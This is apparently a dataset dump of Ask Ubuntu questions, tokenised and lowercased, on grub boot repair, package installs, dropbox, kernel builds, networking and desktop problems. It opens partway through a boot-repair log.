-i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' persistent '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== uefi/legacy mode : this installed-session is not in efi-mode . secureboot disabled . =================== partitions & disks : sda4 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 64 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , . sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , is-correct-efi , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda : gpt , bios_boot , has-correctefi , not-usb , has-os , 40 sectors * 512 bytes =================== parted -l : model : ata st3160215as ( scsi ) disk /dev/sda : 160gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 20.5kb 210mb 210mb fat32 ef boot 2 35.3gb 70.3gb 35.0gb wi msftdata 3 70.3gb 70.3gb 1049kb bios_grub 4 70.3gb 156gb 85.4gb ext4 5 156gb 160gb 4290mb linux-swap ( v1 ) =================== parted -lm : byt ; /dev/sda:160gb : scsi:512:512 : gpt : ata st3160215as ; 1:20.5kb:210mb:210mb : fat32 : ef : boot ; 2:35.3gb:70.3gb:35.0gb : :wi : msftdata ; 3:70.3gb:70.3gb:1049kb : : : bios_grub ; 4:70.3gb:156gb:85.4gb : ext4 : : ; 5:156gb:160gb:4290mb : linux-swap ( v1 ) : : ; =================== mount : /dev/sda4 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=shubham ) /dev/sda1 on /mnt/boot-sav/sda1 type vfat ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : autofs block bsg btrfs-control bus cdrom char console core cpu cpu_dma_latency disk dri ecryptfs fb0 fd full fuse hidraw0 hpet input kmsg log mapper mcelog mem net network_latency network_throughput null port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sda4 sda5 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom usb vga_arbiter vhost-net zero ls /dev/mapper : control =================== hexdump -n512 -c /dev/sda1 00000000 eb 58 90 42 53 44 20 20 34 2e 34 00 02 01 20 00 |.x.bsd 4.4 ... .| 00000010 02 00 00 00 00 f0 00 00 20 00 10 00 00 00 00 00 | ... ... .. ... ... .| 00000020 00 40 06 00 4f 0c 00 00 00 00 00 00 02 00 00 00 | . @ ..o ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 00 01 29 01 17 d6 70 45 46 49 20 20 20 20 20 20 |.. ) ... pefi | 00000050 20 20 46 41 54 33 32 20 20 20 fa 31 c0 8e d0 bc | fat32 .1 ... .| 00000060 00 7c fb 8e d8 e8 00 00 5e 83 c6 19 bb 07 00 fc |.| ... ... ^ ... ... .| 00000070 ac 84 c0 74 06 b4 0e cd 10 eb f5 30 e4 cd 16 cd | ... t ... ... .0 ... .| 00000080 19 0d 0a 4e 6f 6e 2d 73 79 73 74 65 6d 20 64 69 | ... non-system di| 00000090 73 6b 0d 0a 50 72 65 73 73 20 61 6e 79 20 6b 65 |sk..press any ke| 000000a0 79 20 74 6f 20 72 65 62 6f 6f 74 0d 0a 00 00 00 |y to reboot ... ..| 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== df -th : filesystem type size used avail use % mounted on /dev/sda4 ext4 79g 3.2g 71g 5 % / none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup udev devtmpfs 2.0g 12k 2.0g 1 % /dev tmpfs tmpfs 396m 1.1m 395m 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 2.0g 80k 2.0g 1 % /run/shm none tmpfs 100m 72k 100m 1 % /run/user /dev/sda1 vfat 197m 35m 162m 18 % /mnt/boot-sav/sda1 =================== fdisk -l : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2267dead device boot start end blocks id system /dev/sda1 1 312581807 156290903+ ee gpt efi detected . please check the options . =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda4 into the mbr of sda . grub-efi will not be selected by default because : no-win-efi additional repair will be performed : unhide-bootmenu-10s unhide grub boot menu in sda4/etc/default/grub *******lspci -nnk | grep -ia3 vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv730 xt [ radeon hd 4670 ] [ 1002:9490 ] subsystem : pc partner limited / sapphire technology device [ 174b : e101 ] kernel driver in use : radeon 01:00.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] rv710/730 hdmi audio [ radeon hd 4000 series ] [ 1002 : aa38 ] ******* grub-install ( grub ) 2.00-19ubuntu2 , grub-install ( grub ) 2 . reinstall the grub of sda4 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin unhide grub boot menu in sda4/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer . the boot files of [ the os now in use - ubuntu 13.10 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools su
433143	bricscad can not view ipmorted images from excel	after a lot of research and reading and try-fails i have managed to install bricscad and draftsight on my ubuntu 12.04 computer . everything is so fine so far , except one thing : neither can show my excel pictures . let me be more specific ; i have created that dwg in windows & autocad 2013 . it simply contains some drawings and an excel table which is in metafile ( picture ) format . according to this , that table should be taken as a picture not a table i assume . anyway , bricscad shows only the frames of it like an empty rectangle and draftsight shows nothing . varicad warns me that it has 'moved `` ole frames '' to a new coordinate system ' thus results with no success . i thing `` ole frame '' is my excel table/picture . is there any way to convince any of these programs to show them properly ? note : under windows environment , autocad , bricscad and draftsight can view that file without any problems . note2 : i sincerely but hardly hope anybody will see this post thanks to reputation system which puts people into position as they can not have any knowledge outside of the ubuntu system and has no right to ask or tag anything about drafting , dwg files , etc..
433149	error when installing mysql on ubuntu	i get this error when i try to install mysql on ubuntu : sudo apt-get install mysql-server [ sudo ] password for xxxxx : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mysql-server how can i fix this ?
433150	how to drag stencil images in drawing in calligra flow ?	how do you drag stencil symbols from the palette into the drawing with calligra flow 2.8 ? i am just trying to drag and drop and it does n't work . is there some mode switching step i have missed ?
433153	what about gaming , mmo 's , etc . ?	can ubuntu be used for gaming ? i would use office of course and would like to know if google drive , itunes , etc. , would even work . you 're awesome ... keep up the good work .
433161	how to remove the audio and virtual keyboard fron logon	i have ubuntu 12.04.whenever i get at the login screen i get a voice giving me introduction , etc . and also a virtual keyboard is placed below the screen.how do i remove it ?
433166	how to know the release date of my bios version	it 's pretty easy to check the release date of bios version directly from the terminal emulator using a simple single command . so how to do that ?
433170	xprop crashing during script performing	i 'm running specific script ( https : //gist.github.com/primarydataloop/1432762 ) on ubuntu 12.04 lts but i start getting annoying crashing during script performing . script just stop and there appear `` flashing '' error windows with following information : http : //pastebin.com/b2tfbd38 unfortunately i ca n't say anything more , because my skills are not very good to do troubleshooting . could you please help to fix it or at least give me some suggestions how to try to fix it ?
433171	how o kill libreoffice from command line	i am using ubuntu 12.04.4 lts 64 bit my libreoffice suite ( especially writer ) used to freeze ! i tried to search for the executable process at system monitor and command line ( ps ) but did n't find it how can i kill libreoffice and can i kill only the writer ? ( not the calc , impress , .. ) edit : i want something like this : pkill -9 *writer* i need some kind of minified command
433174	is there a terminal commands cheat sheet application ?	i stumbled upon a terminal cheat sheet here and i started wondering if there was anyway to display this in ubuntu 12.04 , much in the way that holding the [ super ] key displays tips for window managing and shortcuts . is there any app or desklet or something that provides this effect ? i 'm very new to linux and this quick reference would be very useful to me .
433182	presentations on lubuntu ?	is there a lightweight package for doing powerpoint presentations on lubuntu ? i have abiword for wordprocessing and gnumeric for spreadsheets , but i 'm not sure about powerpoints ? i heard there was a thing called `` ease '' or something but i do n't know how to find it .
433183	what is the minimal amount of ram to built an 3.11.0 x86_64 kernel on 13.10 with 8 cores ?	i have configured a kvm virtual machine ( vm ) with 8 processor cores and 256 mb of ram and no swap . a minimal text based ubuntu saucy 13.10 amd64 was done . the essential packages to build/recompile the 3.11.0 kernel were installed . the intended architecture for building the kernel is arch=x86_64 . the running kernel is amd64 3.11.0-18-generic . gcc is version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu9 ) . when executing the command : fakeroot make-kpkg -j 8 -- initrd -- append-to-version=-custom kernel_image kernel_headers '' it finally ends with : make : *** [ debian/stamp/build/kernel ] error 2 the first error in the console output is : cc drivers/gpio/gpio-stmpe.o { standard input } : assembler messages : { standard input } :2242 : warning : end of file not at end of a line ; newline inserted { standard input } :4413 : error : unknown pseudo-op : `.l' { standard input } : error : open cfi at the end of file ; missing .cfi_endproc directive gcc : internal compiler error : killed ( program cc1 ) please submit a full bug report , with preprocessed source if appropriate . see < file : ///usr/share/doc/gcc-4.8/readme.bugs > for instructions . make [ 3 ] : *** [ net/ipv6/udp.o ] error 4 make [ 2 ] : *** [ net/ipv6 ] error 2 make [ 2 ] : *** waiting for unfinished jobs ... . my first idea is that the amount of random access memory ( ram ) is confired to low ( 256mb ) . update # 1 after having a look at the console , i am sure that the build machine has too little ram : out of memory : kill process 8128 ( cc1 ) score 117 or sacrifice child killed process 8128 ( cc1 ) total-vm:102432kb , anon-rss:23184kb , file-rss:0kb update # 2 increasing to 384mb , 512 or even 640mb of ram is not enough to stop `` out of memory '' error messages . what is the minimum amount of ram required to build the kernel ?
433185	ubuntu 12.04 ( 32bit ) dropbox keep showing `` connecting ''	i have some questions about executing dropbox on ubuntu 12.04 lts ( 32bit ) . after i followed this instruction and tried to install dropbox , 32-bit : cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86 '' | tar xzf - when i typed this instruction to continue , ~/.dropbox-dist/dropboxd the cursor is left at the same position , and nothing popped out , so i ca n't continue ... the dropbox icon on the right-up-side bar remains grey ... and when i type this in the terminal dropbox status it keeps showing `` connecting ... '' , and nothing happens . i tried to reinstall ( remove and install again , logout and login ) , it just ca n't work . can someone please help me on this issue ?
433186	create a pre-commit git hook to fetch and place in appropriate folders	i 'm trying to create pre-commit git hook that uses the transifex client or custom bash script to fetch all of the language files on transifex and place them in appropriate folders ... could be written in node too . structure gettext .po files located under [ project path ] /locale/ [ language ] /lc_messages/ [ file name ] .po [ project path ] should be relative [ language ] is either the 3 letter code ( eng , fre , spa , ind ) or the 5 character localization code ( en_us , fr_fr , es_es ) [ file name ] will most likely be 'default ' ( ie . default.po ) , but may vary email .html files : located under [ project path ] /views/emails/ [ language ] / [ file name ] .html see above for details on [ project path ] and [ language ] [ file name ] will most likely be 'registration ' ( ie . registration.html ) , but may vary this is all new to me so this is where i 'm got so far : # ! /bin/bash apppath=/marketing language= '' `` file_lang=default file_email=registration lang= $ apppath/locale/ $ language/lc_messages/ $ file_lang.po email= $ apppath/views/emails/ $ language/ $ file_email.html echo $ lang echo echo $ email for file in $ lang do done for file in $ email do done
433187	what does this mean in `` crontab -e '' ?	when i run crontab -e , i see this bit : notice that tasks will be started based on the cron 's system daemon 's notion of time and timezones . how to convert the cron 's system daemon 's notion of time and timezones to something i understand or is there some way i can work it out ? i do n't keep my machine on all the time and so i would like to set a daily time when my machine is most likely to be on .
433188	android mtp mount in ubuntu 13.10	i have a laptop with an usb3.0 and an usb2.0 port . when i connect my android ics in the usb3 0 port it successfully mount the phone storage as media device . but it does n't do so when i attach it with the usb2.0 port . in windows it perfectly works in both ports . is there any workaround ? usb 2.0 output : [ 34.684371 ] usb 2-1.3 : product : symphony-w60 android phone [ 34.684377 ] usb 2-1.3 : manufacturer : symphony-w60 [ 34.684381 ] usb 2-1.3 : serialnumber : ****************** [ 58.191430 ] usb 2-1.3 : usb disconnect , device number 3 [ 59.950519 ] usb 2-1.3 : new high-speed usb device number 4 using ehci-pci [ 60.043808 ] usb 2-1.3 : new usb device found , idvendor=0bb4 , idproduct=2008 [ 60.043820 ] usb 2-1.3 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 60.043835 ] usb 2-1.3 : product : symphony-w60 android phone [ 60.043837 ] usb 2-1.3 : manufacturer : symphony-w60 [ 60.043838 ] usb 2-1.3 : serialnumber : **************** usb3.0 dmesg | tail [ 102.950376 ] usb 3-1 : manufacturer : symphony-w60 [ 102.950381 ] usb 3-1 : serialnumber : ****************** [ 103.673827 ] systemd-hostnamed [ 2345 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 117.202561 ] usb 3-1 : usb disconnect , device number 2 [ 119.283964 ] usb 3-1 : new high-speed usb device number 3 using xhci_hcd [ 119.301950 ] usb 3-1 : new usb device found , idvendor=0bb4 , idproduct=2008 [ 119.301961 ] usb 3-1 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 119.301967 ] usb 3-1 : product : symphony-w60 android phone [ 119.301972 ] usb 3-1 : manufacturer : symphony-w60 [ 119.301977 ] usb 3-1 : serialnumber : ****************
433192	how do i recreate /dev/shm after removing it by mistake ?	i 'm running ubuntu 13.04 and i removed by mistake few folders from /dev/ . as a result i have some problems with some applications like chrome , which is not able to work .
433193	computer will not turn off properly	i have ubuntu gnome 13.10 x86 on my old ~2007 imac . it is not dual booting and it runs an intel processor . it has 2 gb of ram . my issue is that after i push the `` shutdown '' button from the user menu the system just stops in the middle of the shutdown process . to be specific at the `` will now halt '' plymouth works ( the boot screen still moves ) and i can press esc to view the consol output . i also noticed that modem manager was not shutting down properly so i uninstalled it because i use ethernet at my place . another error message is : mount '/ ' busy i think that is the main consern but i ca n't figure it out . i have o hold the power button down .
433205	my kubuntu 13.10 does not connect to the internet untill i make route by manual	i am using kubuntu 13.10 . when i started computer and connected successful to a wireless network , i still can not connect to the internet until i run command arp to add a route to the router . below process is what i done on the terminal : a @ a : ~ $ su /* at this time i was connected to wireless network */ password : root @ a : /home/a # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.1.1 icmp_seq=1 destination host unreachable from 192.168.1.1 icmp_seq=2 destination host unreachable ^c -- - 8.8.8.8 ping statistics -- - 2 packets transmitted , 0 received , +2 errors , 100 % packet loss , time 1001ms root @ a : /home/a # route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 9 0 0 wlan0 root @ a : /home/a # ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_seq=1 ttl=254 time=1.89 ms 64 bytes from 192.168.1.1 : icmp_seq=2 ttl=254 time=2.08 ms 64 bytes from 192.168.1.1 : icmp_seq=3 ttl=254 time=1.48 ms ^c -- - 192.168.1.1 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2003ms rtt min/avg/max/mdev = 1.485/1.822/2.088/0.253 ms root @ a : /home/a # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.1.1 icmp_seq=1 destination host unreachable from 192.168.1.1 icmp_seq=2 destination host unreachable ^c -- - 8.8.8.8 ping statistics -- - 2 packets transmitted , 0 received , +2 errors , 100 % packet loss , time 1001ms root @ a : /home/a # cat a arp -s 192.168.1.1 00:0e : f4:0c:00:6a root @ a : /home/a # . a root @ a : /home/a # route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 9 0 0 wlan0 root @ a : /home/a # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_seq=9 ttl=43 time=259 ms 64 bytes from 8.8.8.8 : icmp_seq=10 ttl=46 time=259 ms 64 bytes from 8.8.8.8 : icmp_seq=11 ttl=46 time=254 ms 64 bytes from 8.8.8.8 : icmp_seq=12 ttl=43 time=250 ms 64 bytes from 8.8.8.8 : icmp_seq=13 ttl=43 time=259 ms 64 bytes from 8.8.8.8 : icmp_seq=14 ttl=43 time=276 ms 64 bytes from 8.8.8.8 : icmp_seq=15 ttl=45 time=257 ms ^c i did n't face with this problem on kubuntu 10.04 . why kubuntu does not add route automatically ? do you know how to make kubuntu do that ? thanks in advance !
433206	is there a nsa backdoor in ubuntu desktop os ?	i heard talk of selinux being in ubuntu and it being a nsa backdoor . source of my worrying : ( so are these guys right ? is there a backdoor in ubuntu ( i use xubuntu if that matters ) ? have any of you guys ever checked ubuntu/xubuntu source for nsa backdoors ? i would but i do n't know how .
433211	running extremely slow and freezing when opening any program	my laptop ( compaq presario cq57 ) all the sudden two days ago when turned on it slowed down upon start-up and i cant do anything if i try to open any document or use the internet it will freeze and will work back after 20 mins . i chkdsk but everything seems to be fine there . i tried downloading some anti-virus free trail and a tune-up but i cant because the computer wont let me do anything . so at the moment i 'm only using microsoft essential but even that i cant open to check for virus or anything . in safe mode though it works perfectly fine . any idea on what the main cause is or how it can be fixed ?
433213	weather indicator applet 0.5.0	not sure how to set up this app it installed it is the panel but , when try to set prefrences for locations it freezes and screen does the grey thing when the system does not like something . please help ? ubuntu 12.04 lts
433218	how can i get my monitor to work with my laptop ?	i 've got a dell xps ... . something ... and ubuntu detected the nvidia card i apparantly have in there . it presented about 6 drivers i could optionally activate - so i did . before i did that , the monitor was working ( although it left a mouse trail behind when i moved the mouse ) . i activated the drivers and now my laptop works better ( looks nicer , faster ) but the monitor wo n't connect and i ca n't see it in the display 's configuration gui . can i fix this ? if so , how ? it 's experiences like this that make me want to ditch linux for my home pc -i mean it seems fine for servers but for this kind of thing , it never seems to 'just work ' like windows does .
433219	ioerror why trying to download ubuntu from wubi	i am trying to download ubuntu using wubi alongside windows 7 32 bit on my pc . i 'm getting this error every time i run the installer . the error is : ioerror : [ < ] urlopen error ( 2 , 'getaddrinfo failed ' ) [ > ] it further tells me to view the log file for more information . i 'm a beginner at this , and so the log file is nothing more than greek and latin to me .
433220	how do i loopback 2 input streams + line-in to line-out ? ( 12.04 )	i 'm trying to put together a simple karaoke system with 2 microphones . i 've fiddled with the config from this post and am able to get 1 mic to loopback , along with youtube , to the the line-out . but i can not seem to get 2 mics to loopback simultaneously . it appears i have to choose which input stream is selected in the sounds app on the inputs tab . any suggestions ?
433230	ubuntu apt-get sources blocked by internet provider	every time i try to upgrade ubuntu , it gives me forbidden access . every time that happens , ubuntu crashes . log file : do you want to continue [ y/n ] ? y get:1 http : //archive.canonical.com/ubuntu/ saucy/partner adobe-flash-properties-gtk i386 11.2.202.346-0saucy1 [ 131 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main libfontembed1 i386 1.0.40-0ubuntu1.1 [ 47.8 kb ] get:3 http : //archive.canonical.com/ubuntu/ saucy/partner adobe-flashplugin i386 11.2.202.346-0saucy1 [ 6,600 kb ] get:4 http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main lightdm i386 1.8.5-0ubuntu1 [ 107 kb ] err http : //us.archive.ubuntu.com/ubuntu/ saucy/main apturl-common i386 0.5.2ubuntu2 403 forbidden [ ip : 91.189.91.13 80 ] get:5 http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main cups-browsed i386 1.0.40-0ubuntu1.1 [ 44.7 kb ] get:6 http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main liblightdm-gobject-1-0 i386 1.8.5-0ubuntu1 [ 33.4 kb ] fetched 6,963 kb in 19s ( 359 kb/s ) failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/a/apturl/apturl-common_0.5.2ubuntu2_i386.deb 403 forbidden [ ip : 91.189.91.13 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i tried to contact the internet provider but there is no support from their side . i do n't have a vpn account . is there another solution ?
433231	how can i share an optical drive in a way that fools the client into thinking it 's a local drive ?	i 'm in the frankly ludicrous situation where my desktop has two optical drives and my media centre has none ( nor space for one ) . before i consider something as extreme as buying an external optical drive , i would like to see if there 's a way of tethering my drives across the network . both machines are ubuntu and they already have nfs sharing in place to access media from the desktop . the reason i 'm asking ( rather than just exporting /media/cdrom ) is that a mounted nfs share does n't look like a cdrom-style device to the remote machine . this is significant to me because i need xbmc to recognise the drive as such in order for it to handle the discs automatically and appropriately . now i do n't know what makes an optical drive look like an optical drive to ubuntu . if i knew that , i 'd probably know what i needed to do . i 'm guessing there 's some hot udev action in there at some point . is there some way of sharing a block-level device ( eg /dev/sr0 ) in so allowing both computers to mount it separately ... i feel like i 'm tumbling down the rabbit hole and i can see all these massively over-engineered solutions like iscsi and passthrough virtualisation popping up in front of me ... surely there 's a simple way of sharing a few drive modes between two ubuntu computers !
433234	not getting output after dmesg	i am a beginner . i wrote a hello world module ( actually copied from the o'reilly book ) . the code is : # include < linux/init.h > # include < linux/module.h > module_license ( `` dual bsd/gpl '' ) ; static int hello_init ( void ) { printk ( kern_alert `` \nhello world '' ) ; return 0 ; } static void hello_exit ( void ) { printk ( kern_alert `` \ngood bye '' ) ; } module_init ( hello_init ) ; module_exit ( hello_exit ) ; so when i insert the module , and dmesg nothig would appear . but when i remove it , and then dmesg , i can see hello world good bye
433236	how to print multiple copies of an image on a single page	i have an image , about 300x300 pixels large . i want to print as many copies as possible on a single page ( i am planning to cut them apart with scissors afterwards ) . is there a way to do this ? is there a way to generate a pdf with copies ( without opening something like gimp and manually doing copy-paste work ) .
433242	atheros ar9285 compatibility with wpa2 enterprise	i have a asus u32u and just install the ubuntu 13.10 . i 'm new working with linux and need a little help . my pc has a qualcomm atheros ar9285 and i can connect to my wi-fi , my problem is in my college , where i can connect via cable but not via wi-fi . my college wi-fi : security : wpa2 enterprise authentication : protected eap ( peap ) inner authentication : mschapv2 any question , just ask . if you need me to put some information about my pc , please leave the respective code .
433244	browser compositor issues - chromium versus chrome	chrome browser beta release 34 includes the google 'aura ' compositor that caused lots of issues on my env using 12.04 with gpu = intel hd4000 . so , i went back to the 'chrome-browser ' general release and stopped using 'chrome-beta ' which i always liked . prior to chrome-beta 34 everything with the gpu with webgl with the gpu drivers was fine . i do not understand the implications of google 's move to 'aura ' compositor on my choice of browser ( chrome or chromium ) for my ubuntu system . i can just install chromium browser and try it for awhile and see whether i like it better than chrome browser . but i am interested in this source divergence around the google 'aura ' compositor and what actually would work better on my linux system ? ? if google are doing something ( fundamental in the aura compositor ) with the way that their browser interacts with x or with gtk i have no idea what i should check in my system to make sure that i have not gummed something up . i did originally have to twiddle some hardware driver things in ubuntu in order to get webgl to work with my gpu ( intel hd4000 drivers ) . -- edit -- google-chrome-unstable ( m35 including aura ) is running fine detls below : remove older package ( stable or beta ) install google-chrome-unstable using apt open broswer to `` chrome : //flags '' changing first option to `` ignore blacklist '' everything looks ok in `` chrome : //gpu '' following tweek above
433246	what variables can we use for the if statements in the generic preseed file	i see we can user if statements in preseed file for maas { { if node.architecture in { 'i386/generic ' , 'amd64/generic ' } } } d-i mirror/http/hostname string archive.ubuntu.com d-i mirror/http/directory string /ubuntu { { else } } d-i mirror/http/hostname string ports.ubuntu.com d-i mirror/http/directory string /ubuntu-ports { { endif } } and i want to know if its also possible to use such if statements with tags so if a node has a tag raid5 that the raid 5 partman code is used and is there some documentation where we can find on what variables we can use like node.tags or node.memory
433248	check dependencies and generate download script before installing by dpkg	i used to install packages with dpkg -i *.deb command for off-line installation . because all deb files are in one folder . i want to avoid dependency error and stop installing packages as broken . ultimately my aim is to check dependencies and generate download script ( if all dependencies are not satisfied ) for only those package which is missing in mentioned folder . so-that i can first download missing packages and then confidently install package by dpkg -i *.deb apt-cache showpkg $ ( find -iname '*.deb ' -exec dpkg -- info ' { } ' \ ; | awk '/package : / { print $ 2 } ' ) shows dependencies but long list and not helpful to check whethter it is satisfied ( exist ) in mentioned folder or not . also dpkg -i *.deb errors following : dpkg-deb : 'cabextract_1.4-4_i386.deb ' contains no control component 'chromium-codecs-ffmpeg-extra_34.0.1847.116-0ubuntu2_i386.deb' dpkg-deb : 'cabextract_1.4-4_i386.deb ' contains no control component 'flashplugin-installer_11.2.202.350ubuntu1_i386.deb' .. .. so on for each deb hence , that commands are not useful for me . further clarification : first check all deb dependencies in my folder . according to package already installed , check this deb 's are able to installed without dependency error or not . if yes then execute dpkg -i *.deb else list missing package which not fond installed or in mentioned folder thanks .
433249	how do i get the two external monitors connected to my laptop to stop mirroring each other ?	i have a lenovo t440 laptop on 12.04 with two external monitors attached ( running through one vga port that goes to this splitter ) . right now ubuntu is counting the two external monitors as one ( they mirror each other ) . it seems like 3 monitors is a bit tricky . for now , how do i get my laptop screen to mirror one ( but not the other ) monitor . that way my laptop and one external monitor will show one picture and the other external monitors will show the other . thanks .
433252	how to do-release-upgrade with automatic yes to all continue and disable reboot after upgrade completion	how do i disable reboot after do-release-upgrade ? is that even possible ? how do i automatically answer y to all continue during do-release-upgrade` ?
433254	libreoffce crashing kubuntu constantly	the problem today libreoffice just started to crash my entire kde desktop every time i try open a file . it takes me to the login screen every single time and i have to log back in again ( losing any saved work in other applications i might add ) . i should mention that opening libreoffice on its own ( i.e . no saved file ) does not crash . it is as soon as you attempt to open a saved file that it crashes . i have had kubuntu for the past 6 months and it has never acted this way with libreoffice . what i have tried till now i have tried re-installing libreoffice ( both with apt-get remove and purge ) and i have also tried installing the latest version of libreoffice using their official ppa . none of them have worked unfortunately which is quite frustrating . looking at my update history , libreoffice has not received an update within the past few days so i do not believe it is entirely at fault . has anyone else experienced this issue and know what to do to fix it ? system information kubuntu 13.10 64bit running on xorg-edgers edit : so i found the xorg log files : [ 2190.484 ] ( ee ) backtrace : [ 2190.484 ] ( ee ) 0 : /usr/bin/x ( xorg_backtrace+0x3d ) [ 0x7f019ba9ffdd ] [ 2190.484 ] ( ee ) 1 : /usr/bin/x ( 0x7f019b8fd000+0x1a6d49 ) [ 0x7f019baa3d49 ] [ 2190.484 ] ( ee ) 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f019a9fd000+0xfbb0 ) [ 0x7f019aa0cbb0 ] [ 2190.484 ] ( ee ) 3 : ? ? [ 0x7fff34fb8768 ] [ 2190.484 ] ( ee ) [ 2190.484 ] ( ee ) segmentation fault at address 0x7fff34fb8768 [ 2190.484 ] ( ee ) fatal server error : [ 2190.484 ] ( ee ) caught signal 11 ( segmentation fault ) . server aborting [ 2190.485 ] ( ee ) [ 2190.485 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 2190.485 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 2190.485 ] ( ee ) [ 2190.485 ] ( ii ) aiglx : suspending aiglx clients for vt switch [ 2190.662 ] ( ee ) server terminated with error ( 1 ) . closing log file . not entirely sure what is causing it but i am guessing this is the reason why libreoffice is crashing ?
